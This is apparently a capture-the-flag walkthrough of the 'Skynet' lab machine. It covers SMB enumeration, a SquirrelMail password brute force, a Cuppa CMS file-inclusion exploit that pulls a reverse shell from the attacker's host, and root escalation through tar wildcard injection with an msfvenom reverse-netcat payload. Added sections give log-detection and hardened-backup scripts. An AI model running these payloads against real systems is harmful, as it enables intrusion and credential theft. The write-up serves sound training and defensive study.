Skynet

5 minute read


General Enumeration and Initial Findings (Nmap, FFuF, SMBClient)

Starting off, as always, with a basic nmap scan

nmap -sC -sV -oN initial -T4 10.10.11.92

Nmap scan report for 10.10.11.92
Host is up (0.21s latency).
Not shown: 994 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
|   256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_  256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: TOP SASL UIDL CAPA PIPELINING AUTH-RESP-CODE RESP-CODES
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imap
|_imap-capabilities: SASL-IR more post-login have IDLE listed capabilities LITERAL+ ENABLE OK ID Pre-login LOGINDISABLEDA0001 IMAP4rev1 LOGIN-REFERRALS
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h40m01s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: skynet
|   NetBIOS computer name: SKYNET\x00
|   Domain name: \x00
|   FQDN: skynet
|_  System time: 2021-06-06T08:26:40-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-06-06T13:26:40
|_  start_date: N/A

A few interesting ports.

80 - Webserver

139 and 445 - SMB.

Let’s kick around the webserver


A search engine that does… nothing? Nothing in the source, no robots.txt. Let’s see if we can bust some directories with FFuF, using the SecLists Common list, matching all response codes and filtering out 404s.

ffuf -u http://10.10.219.151/FUZZ -w /common.txt -mc all -fc 404

.htaccess               [Status: 403, Size: 276, Words: 20, Lines: 10]
.htpasswd               [Status: 403, Size: 276, Words: 20, Lines: 10]
.hta                    [Status: 403, Size: 276, Words: 20, Lines: 10]
admin                   [Status: 301, Size: 310, Words: 20, Lines: 10]
config                  [Status: 301, Size: 311, Words: 20, Lines: 10]
css                     [Status: 301, Size: 308, Words: 20, Lines: 10]
index.html              [Status: 200, Size: 523, Words: 26, Lines: 19]
js                      [Status: 301, Size: 307, Words: 20, Lines: 10]
server-status           [Status: 403, Size: 276, Words: 20, Lines: 10]
squirrelmail            [Status: 301, Size: 317, Words: 20, Lines: 10]

/admin and /config are Forbidden, but how about /squirrelmail?

Login page. Let’s do some more enumeration before trying to crack this.

Since 139 and 445 are open, we’ll take a look at some SMB enumeration using smbclient.

smbclient -L \\\\10.10.219.151\\

Two interesting shares: anonymous and milesdyson.

smbclient \\\\10.10.219.151\\anonymous


Grab attention.txt with get attention.txt

A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson

logs is a directory with three files; only one has any data.

Grab log1.txt with get log1.txt

cyborg007haloterminator
terminator22596
terminator219
.
.
79terminator6
1996terminator

Passwords, maybe? Let’s go back to /squirrelmail and see if any of these work. We saw that there was a milesdyson share, so maybe that’s a username? Let’s use FFuF again, but this time to brute-force the login form.

Capture the login request in Burp to build the command.

ffuf -u http://10.10.219.151/squirrelmail/src/redirect.php -d "login_username=milesdyson&secretkey=FUZZ&js_autodetect_results=1&just_logged_in=1" -H "Content-type: application/x-www-form-urlencoded" -w log1.txt
cyborg007haloterminator [Status: 302, Size: 0, Words: 1, Lines: 1]

Got a 302 redirect, which means this is likely our password. Log in!


Interesting. One of the emails mentions an SMB password, so maybe we can access the milesdyson share now!

cd notes
ls

Grab important.txt with get important.txt

1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife

New endpoint! /45kra24zxs28v3yd


Access (Cuppa CMS, Remote File Inclusion, FFuF)

Running FFuF against the new endpoint with the SecLists Common list, matching all response codes and filtering out 404s:

.htaccess               [Status: 403, Size: 276, Words: 20, Lines: 10]
.htpasswd               [Status: 403, Size: 276, Words: 20, Lines: 10]
.hta                    [Status: 403, Size: 276, Words: 20, Lines: 10]
administrator           [Status: 301, Size: 335, Words: 20, Lines: 10]
index.html              [Status: 200, Size: 418, Words: 45, Lines: 16]

/administrator is running Cuppa CMS.

Looks like there’s a known LFI/RFI exploit for Cuppa CMS, via the urlConfig parameter:

http://10.10.11.92/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php

Using the PoC to confirm it’s vulnerable. The base64-decoded output:

<?php 
	class Configuration{
		public $host = "localhost";
		public $db = "cuppa";
		public $user = "root";
		public $password = "password123";
		public $table_prefix = "cu_";
		public $administrator_template = "default";
		public $list_limit = 25;
		public $token = "OBqIPqlFWf3X";
		public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
		public $upload_default_path = "media/uploadsFiles";
		public $maximum_file_size = "5242880";
		public $secure_login = 0;
		public $secure_login_value = "";
		public $secure_login_redirect = "";
	} 

So we have LFI; let’s try RFI.

Using php-reverse-shell.php from pentestmonkey.

  1. Edit the relevant values (IP and PORT)
  2. Host it on a webserver - python3 -m http.server
  3. Start a listener - nc -lvnp 4444
  4. Include your URL - alerts/alertConfigField.php?urlConfig=http://IP:PORT/php-reverse-shell.php
  5. Send it!
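From the defender’s side, the same urlConfig abuse is easy to spot in the web server’s access log. This is an added example, not part of the writeup: a small POSIX shell filter that flags requests to alertConfigField.php whose urlConfig value carries a stream wrapper, a remote URL or a traversal sequence, after undoing the percent-encoding an attacker might use to hide them. The log lines are constructed for the example; the 10.0.0.x clients are placeholders.

```shell
#!/bin/sh
# Added example (not from the original writeup). Constructed access-log
# lines: two of the page's request shapes, an encoded remote include,
# a benign request, and a traversal attempt.
CONSTRUCTED_LOG='10.0.0.5 - - [06/Jun/2021:13:30:01 -0500] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php HTTP/1.1" 200 1337
10.0.0.5 - - [06/Jun/2021:13:31:12 -0500] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http%3A%2F%2F10.0.0.5%3A8000%2Fphp-reverse-shell.php HTTP/1.1" 200 0
10.0.0.7 - - [06/Jun/2021:13:32:40 -0500] "GET /45kra24zxs28v3yd/administrator/ HTTP/1.1" 200 418
10.0.0.8 - - [06/Jun/2021:13:33:05 -0500] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=alert_default HTTP/1.1" 200 90
10.0.0.9 - - [06/Jun/2021:13:34:22 -0500] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1800'

# Partial percent-decoding: only the characters the match below relies on
# (":" "/" "."), in either hex case, so an encoded payload cannot slip past.
decode_min() {
    printf '%s' "$1" | sed -e 's/%3[Aa]/:/g' -e 's/%2[Ff]/\//g' -e 's/%2[Ee]/./g'
}

# Reads log lines on stdin; prints "<client> <decoded urlConfig>" for every
# request whose urlConfig contains a wrapper/URL scheme or a traversal.
flag_urlconfig() {
    while IFS= read -r line; do
        case "$line" in *alertConfigField.php?*urlConfig=*) ;; *) continue ;; esac
        client=${line%% *}            # first field of the combined log format
        raw=${line#*urlConfig=}
        raw=${raw%% *}                # cut at the space before HTTP/1.1
        raw=${raw%%&*}                # ignore any following parameters
        val=$(decode_min "$raw")
        case "$val" in
            *://*|*../*) echo "$client $val" ;;
        esac
    done
}

# Number of flagged requests in the constructed log.
count_flagged() {
    printf '%s\n' "$CONSTRUCTED_LOG" | flag_urlconfig | wc -l | tr -d ' '
}

count_flagged
```

On a real host, feed the Apache access log in place of the constructed lines and alert on any non-empty output; a legitimate Cuppa install has no reason to pass wrappers or URLs in urlConfig.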



Privesc (tar checkpoints, Wildcard Injection, msfvenom)

Password reuse! Using cyborg007haloterminator we can switch to the milesdyson user.

There’s an interesting script in /home/milesdyson/backups called backup.sh

milesdyson@skynet:~/backups$ cat backup.sh

#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *

Let’s check if it’s running as a cronjob

cat /etc/crontab

# m h dom mon dow user	command
*/1 *	* * *   root	/home/milesdyson/backups/backup.sh
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

So every minute root runs the script, which changes to /var/www/html and runs tar cf on everything in it. milesdyson doesn’t have write access to /var/www/html, but if we drop back down to www-data we do!

Since tar is invoked with a wildcard, it’s vulnerable to injection: the shell expands * into bare filenames, so files whose names look like tar’s checkpoint options get parsed as options rather than as files to archive:

--checkpoint=1
--checkpoint-action=exec=sh shell.sh

Create a reverse shell using msfvenom and start a listener:

msfvenom -p cmd/unix/reverse_netcat lhost=IP lport=PORT R 

nc -lvnp PORT
echo 'SHELLOUTPUT' > shell.sh
touch -- "--checkpoint-action=exec=sh shell.sh"
touch -- --checkpoint=1

Notice the -- before the file name: it tells touch that everything after it is a filename, so we can create names that begin with a dash, which touch would otherwise try to parse as its own options.
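For the fix, the problem is the unquoted * rather than tar itself. This is an added example, not part of the writeup: the unsafe shape of backup.sh beside a hardened version that never puts directory entries on tar’s command line, plus two small checks an administrator can run against the archived directory and the resulting archive. Paths and function names are my own.

```shell
#!/bin/sh
# Added example (not from the original writeup).

# Unsafe (the shape of backup.sh above): the shell expands * into bare
# filenames, so an entry literally named "--checkpoint-action=exec=..."
# reaches tar as an option rather than as a member name.
backup_unsafe() {
    src="$1"; out="$2"
    ( cd "$src" && tar cf "$out" * )
}

# Hardened: enter the directory with -C and archive "." so nothing is
# glob-expanded on the command line; every name tar sees comes from readdir
# and is treated as data. Keeping $out outside $src also avoids archiving
# the backup into itself.
backup_hardened() {
    src="$1"; out="$2"
    tar -cf "$out" -C "$src" .
}

# Audit: count entries whose names begin with "-" (the shape of an injected
# option). Prints the count; anything non-zero in a cron-archived web root
# deserves a look.
count_option_names() {
    n=0
    for f in "$1"/*; do
        [ -e "$f" ] || continue
        case "${f##*/}" in -*) n=$((n + 1)) ;; esac
    done
    echo "$n"
}

# Members of an archive whose names start with "./-": confirms the hardened
# backup stored such names as ordinary files instead of consuming them as
# options.
count_dash_members() {
    tar -tf "$1" | grep -c '^\./-' || true
}
```

Running the hardened version on a directory containing the two checkpoint-named files from the writeup produces an archive that simply contains them; no checkpoint action fires.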

Now we wait…
